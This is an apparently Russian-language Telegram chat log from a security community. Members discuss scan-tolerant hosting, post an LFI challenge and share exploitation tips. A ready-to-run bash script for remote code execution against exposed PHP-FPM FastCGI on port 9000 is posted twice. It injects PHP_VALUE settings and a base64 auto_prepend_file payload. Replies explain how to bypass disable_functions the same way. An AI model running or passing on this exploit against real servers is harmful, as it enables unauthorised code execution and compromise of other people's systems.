b
Да я шучу, мне нет пока нужды, если что напишу)
Спасибо)
Спасибо)
👍
Size: a a a
2020 November 09
?
А что разыгрывается?
q
раз уж про хостеров вопрос подняли - где хостить всякую бело-серую штуку лучше? сидел на scaleway, но они прибили сервы на атомах :(
s
php5, LFI
кто первым решит таск получит 10 бесплатных запросов в боте
@getinstasearchbot
в качестве ответа принимается только вариант запроса который позволит эксплуатировать данную багу.
кто первым решит таск получит 10 бесплатных запросов в боте
@getinstasearchbot
в качестве ответа принимается только вариант запроса который позволит эксплуатировать данную багу.
q
раз уж про хостеров вопрос подняли - где хостить всякую бело-серую штуку лучше? сидел на scaleway, но они прибили сервы на атомах :(
арбузоусточивость особо не нужна, главное чтобы хостер не особо ругался на масскан и прочее
B
говорят, через DO сканят
q
говорят, через DO сканят
там с доступностью не очень, как я слышал
L
👍
Разбань в группе , не буду матюки говорить
WS
говорят, через DO сканят
Я получил бан без объяснения причин и 1 абузу непонятно от какого сайта (закрыли звёздочками домен), попросил сказать, кто автор жалобы - молчание
b
Разбань в группе , не буду матюки говорить
ok
L
ok
Спасибо.
b
Спасибо.
done!
PS
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
Или воспользоваться более мощным клиентом, например, таким.
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
Или воспользоваться более мощным клиентом, например, таким.
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
z
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
А как ты планируешь его обойти?)
B
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
Хм, думаю да
AK
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
можно, также флагами как allow_url_include=1 передается, передаешь disable_functions=''
B
Потому что ты ж можешь рулить дерективами php.ini
PS
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
Или воспользоваться более мощным клиентом, например, таким.
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.
А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
Или воспользоваться более мощным клиентом, например, таким.
ну эта хрень же меняет настройки в phpfpm процессе. Я пытаюсь, но не получается почему то
B
Где тут мастер по phuip-fpizdam, @neexemil
z
Потому что ты ж можешь рулить дерективами php.ini
Но тогда надо пхп перезапускать